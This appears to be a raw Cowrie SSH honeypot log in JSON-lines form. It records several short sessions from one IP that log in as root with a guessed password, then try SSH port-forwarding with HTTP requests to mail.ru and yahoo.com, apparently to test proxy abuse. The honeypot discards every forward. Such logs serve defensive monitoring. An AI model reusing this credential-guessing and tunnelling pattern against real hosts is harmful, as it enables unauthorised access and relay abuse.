{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:29.281419Z","src_ip":"77.83.207.83","session":"f1e272510b3f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:29.531679Z","src_ip":"77.83.207.83","session":"f1e272510b3f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":28214,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:28214","sensor":"my-vps","timestamp":"2025-08-31T03:45:29.582838Z","session":"f1e272510b3f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:29.633157Z","src_ip":"77.83.207.83","session":"f1e272510b3f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":3517,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:3517","sensor":"my-vps","timestamp":"2025-08-31T03:45:29.776677Z","session":"f1e272510b3f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:29.827289Z","src_ip":"77.83.207.83","session":"f1e272510b3f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":9361,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:9361","sensor":"my-vps","timestamp":"2025-08-31T03:45:29.968848Z","session":"f1e272510b3f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:30.019776Z","src_ip":"77.83.207.83","session":"f1e272510b3f"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:30.071330Z","src_ip":"77.83.207.83","session":"f1e272510b3f"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":49275,"dst_ip":"1.2.3.4","dst_port":22,"session":"c751f57987e6","protocol":"ssh","message":"New connection: 77.83.207.83:49275 (1.2.3.4:22) [session: c751f57987e6]","sensor":"my-vps","timestamp":"2025-08-31T03:45:30.119525Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:30.120209Z","src_ip":"77.83.207.83","session":"c751f57987e6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:30.170101Z","src_ip":"77.83.207.83","session":"c751f57987e6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:30.417899Z","src_ip":"77.83.207.83","session":"c751f57987e6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":30250,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:30250","sensor":"my-vps","timestamp":"2025-08-31T03:45:30.468512Z","session":"c751f57987e6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:30.518945Z","src_ip":"77.83.207.83","session":"c751f57987e6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":11859,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:11859","sensor":"my-vps","timestamp":"2025-08-31T03:45:30.660192Z","session":"c751f57987e6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:30.709915Z","src_ip":"77.83.207.83","session":"c751f57987e6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":10348,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:10348","sensor":"my-vps","timestamp":"2025-08-31T03:45:30.852026Z","session":"c751f57987e6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:30.902014Z","src_ip":"77.83.207.83","session":"c751f57987e6"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:30.952716Z","src_ip":"77.83.207.83","session":"c751f57987e6"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":49366,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3f2dc689a26","protocol":"ssh","message":"New connection: 77.83.207.83:49366 (1.2.3.4:22) [session: e3f2dc689a26]","sensor":"my-vps","timestamp":"2025-08-31T03:45:31.002934Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:31.004332Z","src_ip":"77.83.207.83","session":"e3f2dc689a26"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:31.054940Z","src_ip":"77.83.207.83","session":"e3f2dc689a26"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:31.306384Z","src_ip":"77.83.207.83","session":"e3f2dc689a26"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":5534,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:5534","sensor":"my-vps","timestamp":"2025-08-31T03:45:31.357821Z","session":"e3f2dc689a26"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:31.408546Z","src_ip":"77.83.207.83","session":"e3f2dc689a26"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":8664,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:8664","sensor":"my-vps","timestamp":"2025-08-31T03:45:31.552846Z","session":"e3f2dc689a26"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:31.603295Z","src_ip":"77.83.207.83","session":"e3f2dc689a26"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":30094,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:30094","sensor":"my-vps","timestamp":"2025-08-31T03:45:31.749062Z","session":"e3f2dc689a26"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:31.799469Z","src_ip":"77.83.207.83","session":"e3f2dc689a26"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:31.850831Z","src_ip":"77.83.207.83","session":"e3f2dc689a26"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":49474,"dst_ip":"1.2.3.4","dst_port":22,"session":"74968a940a8e","protocol":"ssh","message":"New connection: 77.83.207.83:49474 (1.2.3.4:22) [session: 74968a940a8e]","sensor":"my-vps","timestamp":"2025-08-31T03:45:31.903190Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:31.913243Z","src_ip":"77.83.207.83","session":"74968a940a8e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:31.957357Z","src_ip":"77.83.207.83","session":"74968a940a8e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:32.223503Z","src_ip":"77.83.207.83","session":"74968a940a8e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":8847,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:8847","sensor":"my-vps","timestamp":"2025-08-31T03:45:32.279434Z","session":"74968a940a8e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:32.333027Z","src_ip":"77.83.207.83","session":"74968a940a8e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":15471,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:15471","sensor":"my-vps","timestamp":"2025-08-31T03:45:32.479805Z","session":"74968a940a8e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:32.533331Z","src_ip":"77.83.207.83","session":"74968a940a8e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":8531,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:8531","sensor":"my-vps","timestamp":"2025-08-31T03:45:32.683598Z","session":"74968a940a8e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:32.737021Z","src_ip":"77.83.207.83","session":"74968a940a8e"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:32.791103Z","src_ip":"77.83.207.83","session":"74968a940a8e"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":49575,"dst_ip":"1.2.3.4","dst_port":22,"session":"89bd7159b018","protocol":"ssh","message":"New connection: 77.83.207.83:49575 (1.2.3.4:22) [session: 89bd7159b018]","sensor":"my-vps","timestamp":"2025-08-31T03:45:32.841805Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:32.843278Z","src_ip":"77.83.207.83","session":"89bd7159b018"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:32.895449Z","src_ip":"77.83.207.83","session":"89bd7159b018"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:33.155234Z","src_ip":"77.83.207.83","session":"89bd7159b018"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":24109,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:24109","sensor":"my-vps","timestamp":"2025-08-31T03:45:33.208172Z","session":"89bd7159b018"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:33.260349Z","src_ip":"77.83.207.83","session":"89bd7159b018"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":12698,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:12698","sensor":"my-vps","timestamp":"2025-08-31T03:45:33.406501Z","session":"89bd7159b018"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:33.458607Z","src_ip":"77.83.207.83","session":"89bd7159b018"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":2827,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:2827","sensor":"my-vps","timestamp":"2025-08-31T03:45:33.606714Z","session":"89bd7159b018"}
